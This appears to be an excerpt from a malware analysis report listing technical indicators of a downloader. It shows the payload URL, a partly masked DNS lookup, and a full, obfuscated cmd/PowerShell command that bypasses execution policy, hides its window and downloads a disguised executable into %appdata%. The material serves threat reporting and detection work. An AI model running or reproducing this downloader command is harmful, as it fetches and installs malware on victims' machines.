Technical Information
- http://www.iemailpremium.com/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poweRShEll.eXE -ExECUTioNpOLiCy BypaSS -nOpROFIle -wiNdowStYLe hidDEn (NEw-OBJect sYSTem.NET.webcLIent).DoWnlOADfiLE('http://www.iemailpremium.com/read.php?f=1.gif','%ApPDaTa%.exe'...
- DNS ASK ie####premium.com
- '<SYSTEM32>\cmd.exe' /c "poweRShEll.eXE -ExECUTioNpOLiCy BypaSS -nOpROFIle -wiNdowStYLe hidDEn (NEw-OBJect sYSTem.NET.webcLIent).DoWnlOADfiLE('http://www.iemailpremium.com/read.php?f=1.gif','%ApPDaTa%.exe'...' (with hidden window)